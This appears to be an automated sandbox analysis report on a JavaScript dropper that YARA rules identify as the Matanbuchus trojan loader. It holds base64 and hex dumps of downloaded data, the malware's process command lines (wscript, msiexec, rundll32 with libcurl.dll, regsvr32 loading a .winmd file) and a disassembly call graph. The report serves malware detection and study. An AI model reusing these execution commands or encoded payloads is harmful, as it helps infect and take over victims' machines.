                                              Data Ascii: +6Y/2iypolF5YTPaJKnB0iWgN1GtmYb7tK7/na2Zhvu0N7i94rlivjWeAJHqGLa+eetyVegUQrwtnvQTZVRKN3jpdq2mFUI2eGIz2iypjTac8TtB6gBGvi2KuBRp3A/T8y/P0qBZw3qU6Wa96ACyvD2KuhSB3gfT8S/v2jS1wTXxJ+vaLInBJvE3x9okrY03/BQ7QeoYsvB5ikVZcd4fz/Mnx9gjUclKjGJGWKYQujd4YjO6aN4Hw3s
                                              2024-12-06 21:20:45 UTC16384INData Raw: 36 51 43 30 4f 4d 34 6e 7a 64 53 68 49 52 48 77 50 62 6f 7a 55 57 46 56 77 58 70 6f 0d 0a 36 33 36 39 36 67 42 47 76 69 32 53 75 42 53 52 33 41 2f 37 38 79 2f 66 32 43 79 46 78 32 4b 30 36 32 61 78 70 68 43 65 4e 33 68 69 4d 39 6f 6b 64 63 4e 79 6e 4f 6c 2b 54 65 67 59 6f 72 77 74 0d 0a 69 72 6f 45 70 64 34 50 30 2f 45 6e 2b 39 77 73 6b 63 4e 36 70 4f 6c 6d 73 54 50 65 42 2b 75 51 52 67 35 51 59 62 78 64 79 49 65 64 75 42 52 70 33 67 63 72 38 7a 63 54 32 47 6e 63 47 6a 50 7a 0d 0a 4a 7a 76 61 68 41 69 4a 2b 37 53 75 2f 35 32 74 6d 59 62 37 74 44 65 34 76 54 79 57 68 76 75 30 72 76 2b 64 72 5a 6d 47 2b 37 51 33 75 4c 30 77 76 6b 4f 38 50 57 71 77 6b 58 48 63 44 7a 2f 7a 0d 0a 4c 7a 74 71 4c 46 6b 2b 41 50 4d 33 4f 39 67 30 71 63 46 36 68 49 6f 59 67 32 4e
                                              Data Ascii: 6QC0OM4nzdShIRHwPbozUWFVwXpo63696gBGvi2SuBSR3A/78y/f2CyFx2K062axphCeN3hiM9okdcNynOl+TegYorwtiroEpd4P0/En+9wskcN6pOlmsTPeB+uQRg5QYbxdyIeduBRp3gcr8zcT2GncGjPzJzvahAiJ+7Su/52tmYb7tDe4vTyWhvu0rv+drZmG+7Q3uL0wvkO8PWqwkXHcDz/zLztqLFk+APM3O9g0qcF6hIoYg2N
                                              2024-12-06 21:20:45 UTC16384INData Raw: 61 4f 75 6d 51 5a 36 71 74 62 37 39 0d 0a 64 73 79 75 6e 72 35 44 76 44 58 36 73 4c 68 67 33 41 65 76 2b 78 2b 72 55 52 64 4c 78 36 4a 6f 6e 63 79 75 36 4d 44 36 79 59 65 64 50 4f 63 6b 54 52 71 38 39 64 4c 4e 72 70 36 39 64 53 5a 35 0d 0a 59 74 69 43 36 74 68 61 79 49 65 64 75 4d 52 31 71 72 58 49 38 65 39 37 72 35 36 71 77 36 49 30 6e 4d 79 75 36 74 41 43 79 59 65 64 75 4e 77 74 71 37 58 49 38 53 63 2f 32 43 78 46 6a 58 4b 67 0d 0a 59 6a 4e 52 59 62 79 78 4e 33 68 69 76 73 52 42 71 37 58 49 38 54 65 6e 32 69 54 42 77 37 4a 41 6e 63 79 75 36 68 6a 65 74 41 46 32 50 43 64 74 6b 73 38 4c 68 35 33 4d 55 47 46 56 53 74 78 79 0d 0a 70 62 5a 74 6e 71 71 31 4e 33 68 69 4d 39 76 30 61 62 58 49 68 2b 70 6d 75 57 37 6a 44 39 2f 39 6f 6b 64 47 36 68 6a 65 76 47 6e
                                              Data Ascii: aOumQZ6qtb79dsyunr5DvDX6sLhg3Aev+x+rURdLx6Joncyu6MD6yYedPOckTRq89dLNrp69dSZ5YtiC6thayIeduMR1qrXI8e97r56qw6I0nMyu6tACyYeduNwtq7XI8Sc/2CxFjXKgYjNRYbyxN3hivsRBq7XI8Ten2iTBw7JAncyu6hjetAF2PCdtks8Lh53MUGFVStxypbZtnqq1N3hiM9v0abXIh+pmuW7jD9/9okdG6hjevGn
                                              2024-12-06 21:20:45 UTC16384INData Raw: 67 55 74 64 35 43 76 6a 4a 6d 39 42 53 64 56 55 6f 33 65 4f 6c 6d 57 65 67 41 68 72 77 39 7a 72 6f 55 73 64 34 48 35 2f 45 76 39 39 6f 30 6d 63 4e 69 6b 4f 6c 32 75 65 67 51 67 72 77 31 0d 0a 71 72 6f 63 30 64 67 66 78 53 72 70 64 72 6b 78 33 67 66 7a 6b 49 35 4f 72 70 34 2f 53 72 6f 31 79 6d 4b 35 6b 4e 32 31 79 50 75 6d 4f 31 37 58 68 63 2f 6c 44 58 56 62 52 31 31 56 53 6c 2b 49 0d 0a 46 44 74 42 43 65 33 47 50 32 69 4b 38 32 64 6e 56 63 6e 7a 64 4b 56 32 6b 57 46 56 53 6a 66 31 4c 35 2f 59 4c 4c 48 42 59 70 7a 70 4d 64 67 6b 36 63 46 36 6e 4f 6c 6d 6b 65 68 45 77 58 4c 45 0d 0a 36 33 62 70 36 68 6a 79 76 6a 58 57 39 42 53 64 71 72 58 49 68 2b 39 2b 2b 59 6d 64 6b 7a 64 34 36 58 62 6c 36 68 69 2b 55 2f 46 76 4d 31 46 68 56 63 48 53 4a 61 48 2f 6e 61 32
                                              Data Ascii: gUtd5CvjJm9BSdVUo3eOlmWegAhrw9zroUsd4H5/Ev99o0mcNikOl2uegQgrw1qroc0dgfxSrpdrkx3gfzkI5Orp4/Sro1ymK5kN21yPumO17Xhc/lDXVbR11VSl+IFDtBCe3GP2iK82dnVcnzdKV2kWFVSjf1L5/YLLHBYpzpMdgk6cF6nOlmkehEwXLE63bp6hjyvjXW9BSdqrXIh+9++Ymdkzd46Xbl6hi+U/FvM1FhVcHSJaH/na2
                                              2024-12-06 21:20:45 UTC16384INData Raw: 58 49 68 2b 48 66 51 65 71 5a 77 35 4b 34 6e 4d 79 75 36 73 41 36 79 49 65 64 59 62 6b 34 4a 30 6f 33 38 79 66 44 32 6d 6d 39 4e 59 56 34 0d 0a 59 76 55 55 69 46 54 42 65 6f 6a 70 49 74 6a 30 50 62 58 49 68 2b 39 32 75 4f 6a 51 4a 73 69 48 6e 62 67 63 61 64 37 66 57 34 65 64 7a 4e 74 6a 33 55 75 36 39 51 72 4d 72 70 37 63 78 31 4f 48 0d 0a 6e 63 7a 61 4e 46 33 42 73 68 79 64 7a 4b 37 71 58 63 4e 39 66 4b 56 32 72 5a 36 71 74 63 6a 31 4c 2f 2b 35 73 42 4e 49 4e 33 66 55 5a 70 30 7a 32 41 66 6a 6b 43 61 34 55 32 48 65 44 7a 2b 52 0d 0a 69 44 64 52 59 64 34 50 78 2f 75 69 4e 39 6a 6b 4e 62 58 49 68 39 73 33 55 57 46 56 49 65 61 48 36 62 59 78 6e 71 71 31 4e 43 68 6d 75 73 51 39 71 72 58 49 38 2b 39 76 72 70 36 71 79 51 35 34 0d 0a 46 31 47 58 4a 4c 31 4b 38
                                              Data Ascii: XIh+HfQeqZw5K4nMyu6sA6yIedYbk4J0o38yfD2mm9NYV4YvUUiFTBeojpItj0PbXIh+92uOjQJsiHnbgcad7fW4edzNtj3Uu69QrMrp7cx1OHnczaNF3BshydzK7qXcN9fKV2rZ6qtcj1L/+5sBNIN3fUZp0z2AfjkCa4U2HeDz+RiDdRYd4Px/uiN9jkNbXIh9s3UWFVIeaH6bYxnqq1NChmusQ9qrXI8+9vrp6qyQ54F1GXJL1K8
                                              2024-12-06 21:20:45 UTC16384INData Raw: 67 63 69 64 61 4c 50 35 42 75 58 56 46 68 33 67 66 66 6b 4d 59 72 55 32 48 65 42 38 76 7a 0d 0a 61 39 75 72 34 6c 56 4b 76 43 32 65 75 46 4f 49 4d 55 67 33 65 4f 6c 32 72 65 4b 56 54 72 34 39 70 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 53 6c 56 68 6f 7a 38 54 66 7a 32 69 79 56 77 53 62 78 0d 0a 4e 34 2f 61 4a 4f 6e 4b 44 33 6f 58 4f 70 59 6b 6a 55 73 33 65 47 4c 59 56 71 59 51 6b 6a 64 34 59 6a 50 62 4c 49 33 43 65 6f 70 74 68 51 53 54 30 4a 68 43 4a 2b 6c 32 72 65 4b 56 54 72 34 39 0d 0a 32 6f 70 56 59 56 56 4b 58 4b 6d 64 75 42 54 5a 56 68 6f 7a 38 54 65 48 32 69 7a 68 77 53 62 78 4e 34 50 61 4a 4f 58 4b 44 33 6b 58 4f 70 59 6b 67 55 73 33 65 47 4c 59 56 71 59 51 6e 6a 64 34 0d 0a 59 6a 50 62 4c 49 48 43 65 6f 6c 74 68 51 53 51 30 4a 68 43 62 77 6f 79 51
                                              Data Ascii: gcidaLP5BuXVFh3gffkMYrU2HeB8vza9ur4lVKvC2euFOIMUg3eOl2reKVTr49popVYVVKXKmduBSlVhoz8Tfz2iyVwSbxN4/aJOnKD3oXOpYkjUs3eGLYVqYQkjd4YjPbLI3CeopthQST0JhCJ+l2reKVTr492opVYVVKXKmduBTZVhoz8TeH2izhwSbxN4PaJOXKD3kXOpYkgUs3eGLYVqYQnjd4YjPbLIHCeolthQSQ0JhCbwoyQ
                                              2024-12-06 21:20:45 UTC16384INData Raw: 2f 77 50 66 71 33 31 57 6c 46 77 58 4c 67 0d 0a 34 66 4e 51 36 4e 41 6d 79 59 65 64 75 42 7a 35 33 31 75 2f 4c 64 2b 77 46 50 6c 55 79 6b 72 46 59 6b 61 2f 36 68 44 53 48 50 30 4f 7a 61 36 65 33 4d 39 66 68 70 33 4d 32 75 77 39 74 4d 69 48 0d 0a 36 37 34 31 6e 36 71 31 76 4f 30 47 7a 61 36 65 33 4e 39 58 68 70 33 4d 32 75 51 31 74 4d 69 48 4d 6c 76 56 35 56 31 61 75 76 56 4b 7a 36 36 65 76 57 30 38 68 35 33 31 46 4a 31 44 78 37 70 51 0d 0a 6e 73 79 75 4d 44 39 61 75 75 33 69 79 61 36 65 42 38 46 36 69 49 72 34 64 57 4a 56 77 37 49 6b 6e 4d 79 75 36 74 41 57 79 59 65 64 75 74 51 35 71 37 58 49 76 69 66 50 52 75 6f 59 75 72 53 35 0d 0a 49 72 68 41 36 4d 41 65 79 6f 65 64 75 42 42 6c 33 4d 39 76 68 5a 33 4d 32 69 68 64 77 37 6f 6b 6e 38 79 75 37 4d 41 65 79
                                              Data Ascii: /wPfq31WlFwXLg4fNQ6NAmyYeduBz531u/Ld+wFPlUykrFYka/6hDSHP0Oza6e3M9fhp3M2uw9tMiH6741n6q1vO0Gza6e3N9Xhp3M2uQ1tMiHMlvV5V1auvVKz66evW08h531FJ1Dx7pQnsyuMD9auu3iya6eB8F6iIr4dWJVw7IknMyu6tAWyYedutQ5q7XIvifPRuoYurS5IrhA6MAeyoeduBBl3M9vhZ3M2ihdw7okn8yu7MAey
                                              2024-12-06 21:20:45 UTC16384INData Raw: 62 57 53 52 6b 31 70 62 64 53 43 4b 67 43 64 69 56 63 46 36 68 4f 70 79 4d 65 6f 51 74 72 79 64 50 2f 46 56 59 5a 6d 47 2b 37 51 33 75 4c 33 69 75 57 61 2b 4e 5a 36 34 46 47 6e 63 44 38 50 7a 0d 0a 4c 38 66 59 4c 49 48 42 59 6f 54 72 5a 71 48 71 45 4c 71 2b 50 5a 71 34 48 4a 6d 53 53 7a 64 34 59 6a 50 61 4e 4b 32 4e 64 58 78 69 4d 31 46 68 33 67 38 2f 38 32 71 36 48 49 33 65 48 39 76 78 0d 0a 4e 39 76 63 4a 4c 33 44 63 71 54 70 66 6c 6e 71 52 4d 45 31 38 53 66 58 32 69 79 78 77 33 71 59 37 32 61 78 36 41 43 53 76 44 32 2b 75 46 6b 77 33 68 2f 76 38 32 42 6a 32 69 79 70 6f 68 6d 62 0d 0a 6e 4d 7a 61 4a 4b 6e 42 30 69 57 67 4e 31 47 74 6d 59 62 37 74 44 65 34 76 65 4b 35 58 72 34 31 6e 72 67 55 6e 64 77 50 77 2f 4d 76 78 39 67 73 72 63 46 69 67 4b 55 78 55
                                              Data Ascii: bWSRk1pbdSCKgCdiVcF6hOpyMeoQtrydP/FVYZmG+7Q3uL3iuWa+NZ64FGncD8PzL8fYLIHBYoTrZqHqELq+PZq4HJmSSzd4YjPaNK2NdXxiM1Fh3g8/82q6HI3eH9vxN9vcJL3DcqTpflnqRME18SfX2iyxw3qY72ax6ACSvD2+uFkw3h/v82Bj2iypohmbnMzaJKnB0iWgN1GtmYb7tDe4veK5Xr41nrgUndwPw/Mvx9gsrcFigKUxU
                                              2024-12-06 21:20:45 UTC16384INData Raw: 58 49 31 79 76 47 4d 7a 55 57 47 2b 54 66 41 39 70 6a 4e 52 59 56 58 41 63 72 79 4c 47 46 42 68 56 61 4d 54 65 57 49 7a 30 52 79 6d 54 45 49 35 0d 0a 34 6b 36 6a 5a 69 42 78 76 44 56 71 75 42 42 70 33 68 73 37 38 36 72 62 6d 77 5a 52 53 72 77 31 62 6c 56 65 54 78 52 43 71 49 36 6d 64 79 74 6f 6b 67 2f 33 65 57 49 7a 55 59 70 53 6a 58 4b 34 0d 0a 59 6a 4e 52 59 64 38 50 39 35 47 47 4d 31 46 68 76 4a 63 33 65 47 4b 7a 4c 4a 4a 53 50 33 54 34 48 38 46 58 46 47 6a 42 59 6e 54 70 65 56 6e 71 42 30 62 66 2f 51 55 33 55 65 6f 51 51 73 56 33 0d 0a 63 6e 74 5a 42 31 70 6b 2f 2b 65 55 39 78 55 62 58 49 31 79 78 47 4d 7a 55 57 47 2b 54 66 41 39 33 6a 4e 52 59 56 58 41 63 73 53 4c 71 46 46 68 56 61 4f 6a 65 47 49 7a 30 52 79 6d 54 45 49 39 0d 0a 34 6b 36 6a 5a 43 42
                                              Data Ascii: XI1yvGMzUWG+TfA9pjNRYVXAcryLGFBhVaMTeWIz0RymTEI54k6jZiBxvDVquBBp3hs786rbmwZRSrw1blVeTxRCqI6mdytokg/3eWIzUYpSjXK4YjNRYd8P95GGM1FhvJc3eGKzLJJSP3T4H8FXFGjBYnTpeVnqB0bf/QU3UeoQQsV3cntZB1pk/+eU9xUbXI1yxGMzUWG+TfA93jNRYVXAcsSLqFFhVaOjeGIz0RymTEI94k6jZCB


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:16:19:34
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_21-04-53.js"
                                              Imagebase:0x7ff6c1a50000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:16:19:34
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\msiexec.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                              Imagebase:0x7ff6839d0000
                                              File size:69'632 bytes
                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:2
                                              Start time:16:19:38
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding B05575DDF7F0D21FAECF0BEEF6387BEE
                                              Imagebase:0x450000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:16:19:38
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                                              Imagebase:0x7ff7e8070000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:16:19:38
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                                              Imagebase:0xb90000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000004.00000002.2943950120.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000004.00000002.2944220363.0000000005464000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:16:19:43
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x7ff634c10000
                                              File size:25'088 bytes
                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:16:19:43
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                              Wow64 process (32bit):true
                                              Commandline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x90000
                                              File size:20'992 bytes
                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000006.00000002.2016135931.000000007F6D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000006.00000002.2015787150.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:16:19:59
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:16:20:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x7ff634c10000
                                              File size:25'088 bytes
                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:16:20:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                              Wow64 process (32bit):true
                                              Commandline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x90000
                                              File size:20'992 bytes
                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2556127430.0000000004D02000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000B.00000002.2556486132.000000007EBE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:16:21:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\System32\regsvr32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x7ff634c10000
                                              File size:25'088 bytes
                                              MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:14
                                              Start time:16:21:42
                                              Start date:06/12/2024
                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                              Wow64 process (32bit):true
                                              Commandline: -e -n -i:"C:\Users\user\8f08\813848\813848.winmd" "C:\Users\user\8f08\813848\813848.winmd"
                                              Imagebase:0x90000
                                              File size:20'992 bytes
                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:9.1%
                                                Dynamic/Decrypted Code Coverage:97.8%
                                                Signature Coverage:41.8%
                                                Total number of Nodes:1532
                                                Total number of Limit Nodes:10
                                                execution_graph 45685 6c33ed90 45688 6c35d860 45685->45688 45689 6c35d88a 45688->45689 45705 6c35d120 45689->45705 45694 6c35dc0e 45696 6c35e432 45694->45696 45725 6c35d210 StrCmpIW 45694->45725 45726 6c35d180 StrCmpIW 45696->45726 45698 6c33edc1 45701 6c35d150 StrCmpIW 45703 6c35d897 45701->45703 45702 6c35d0f0 StrCmpIW 45702->45703 45703->45694 45703->45698 45703->45701 45703->45702 45704 6c35d240 StrCmpIW 45703->45704 45709 6c35d1e0 45703->45709 45713 6c35d1b0 45703->45713 45717 6c35d0c0 45703->45717 45721 6c35d270 45703->45721 45704->45703 45706 6c35d13e 45705->45706 45707 6c35d12c 45705->45707 45706->45703 45727 6c35e660 StrCmpIW 45707->45727 45710 6c35d1fe CoInitializeSecurity 45709->45710 45711 6c35d1ec 45709->45711 45710->45703 45728 6c35e660 StrCmpIW 45711->45728 45714 6c35d1ce 45713->45714 45715 6c35d1bc 45713->45715 45714->45703 45729 6c35e660 StrCmpIW 45715->45729 45718 6c35d0de 45717->45718 45719 6c35d0cc 45717->45719 45718->45703 45730 6c35e660 StrCmpIW 45719->45730 45722 6c35d28e 45721->45722 45723 6c35d27c 45721->45723 45722->45703 45731 6c35e660 StrCmpIW 45723->45731 45725->45696 45726->45698 45727->45706 45728->45710 45729->45714 45730->45718 45731->45722 45732 7f2ed039 45733 7f2ed04f 45732->45733 45735 7f2ee441 swprintf 45733->45735 45761 7f2d8840 45733->45761 45737 7f2ed7f0 45739 7f2ee44b 45737->45739 45741 7f2ed7f8 swprintf 45737->45741 45738 7f2ed293 swprintf 45738->45735 45764 7f2c3740 45738->45764 45740 7f2d8840 3 API calls 45739->45740 45744 7f2ee45f swprintf 45739->45744 45740->45744 45743 7f2ed8cb GetTempFileNameW 45741->45743 45742 7f2ee5e3 lstrlenW 45742->45744 45746 7f2ed94e GetCurrentDirectoryA 45743->45746 45744->45735 45744->45742 45747 7f2eda30 45746->45747 45747->45735 45748 7f2edb93 GetTempFileNameA 45747->45748 45750 7f2edbf7 swprintf 45748->45750 45749 7f2ede9e GetPEB 45751 7f2edf01 45749->45751 45750->45749 45780 7f2b77a0 45751->45780 45753 7f2ee11e 45754 7f2ee12d GetPEB 45753->45754 45755 7f2ee125 ExitProcess 45753->45755 45759 7f2ee1e8 CreateThread 45754->45759 45788 7f2a1e40 45759->45788 45805 7f2b9830 IsCharLowerA 45759->45805 45793 7f2d9280 45761->45793 45763 7f2d8a4e swprintf 45763->45738 45766 7f2c3986 45764->45766 45765 7f2c39eb GetPEB 45767 7f2c3a7d 45765->45767 45766->45765 45768 7f2c3d1a GetPEB 45767->45768 45769 7f2c3dac GetPEB 45768->45769 45772 7f2c4023 GetPEB 45769->45772 45774 7f2c43de PathIsDirectoryW 45772->45774 45778 7f2c45b9 45774->45778 45779 7f2c48d1 swprintf 45774->45779 45775 7f2c47db LoadLibraryExA 45776 7f2c4857 45775->45776 45777 7f2d9280 3 API calls 45776->45777 45776->45779 45777->45779 45778->45775 45779->45737 45781 7f2b7a3f CreateMutexA 45780->45781 45784 7f2b79a6 45780->45784 45782 7f2b7b44 GetLastError 45781->45782 45783 7f2b7a5a swprintf 45781->45783 45782->45783 45786 7f2b7b55 swprintf 45782->45786 45783->45753 45784->45781 45787 7f2b7be4 CloseHandle 45786->45787 45787->45783 45789 7f2a1e4c 45788->45789 45790 7f2a1e5e 45788->45790 45804 7f2ded70 GetPEB 45789->45804 45792 7f2a20b0 GetPEB 45790->45792 45792->45735 45798 7f2d95f0 45793->45798 45796 7f2d9497 GetShellWindow 45797 7f2d94a1 swprintf 45796->45797 45797->45763 45799 7f2d9817 GetProcessHeap 45798->45799 45801 7f2d988d 45799->45801 45802 7f2d9483 45801->45802 45803 7f2d98fe GetDriveTypeA 45801->45803 45802->45796 45802->45797 45803->45802 45804->45790 45806 7f2d9280 3 API calls 45805->45806 45809 7f2b9aa8 45806->45809 45807 7f2d8840 3 API calls 45815 7f2b9dcc 45807->45815 45810 7f2d9280 3 API calls 45809->45810 45818 7f2b9c77 45809->45818 45810->45818 45811 7f2b9fbd swprintf 45878 7f2e26f0 45811->45878 45875 7f2eee28 45815->45875 45818->45807 45818->45815 45822 7f2a63a0 std::ios_base::clear 26 API calls 45823 7f2ba11b 45822->45823 45824 7f2a63a0 std::ios_base::clear 26 API calls 45823->45824 45825 7f2ba13c 45824->45825 45826 7f2a63a0 std::ios_base::clear 26 API calls 45825->45826 45827 7f2ba15d 45826->45827 45959 7f2dc4a0 45827->45959 45830 7f2a63a0 std::ios_base::clear 26 API calls 45831 7f2ba194 45830->45831 45832 7f2a63a0 std::ios_base::clear 26 API calls 45831->45832 45833 7f2ba1b5 45832->45833 46078 7f2d7660 45833->46078 45835 7f2bd319 46329 7f2a9250 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45835->46329 45837 7f2bd32f 46330 7f2a9b00 11 API calls std::ios_base::clear 45837->46330 45839 7f2bd33e 46331 7f2a9a30 11 API calls std::ios_base::clear 45839->46331 45841 7f2bd350 45842 7f2ba363 GetEnvironmentVariableW 45843 7f2ba1c2 swprintf 45842->45843 45843->45835 45843->45842 45846 7f29d1f0 26 API calls 45843->45846 45852 7f294760 26 API calls 45843->45852 45854 7f2bd308 Sleep 45843->45854 45856 7f2c3200 55 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45843->45856 45858 7f2e0c00 113 API calls 45843->45858 45859 7f2945d0 56 API calls 45843->45859 45860 7f2c7680 56 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45843->45860 45865 7f2942c0 56 API calls 45843->45865 45870 7f2dc4a0 56 API calls 45843->45870 45872 7f2a63a0 26 API calls std::ios_base::clear 45843->45872 45874 7f2a9250 56 API calls 45843->45874 46293 7f2944e0 45843->46293 46300 7f2a67d0 45843->46300 46304 7f2a9d60 45843->46304 46313 7f2ca800 52 API calls 2 library calls 45843->46313 46314 7f2cc160 52 API calls 2 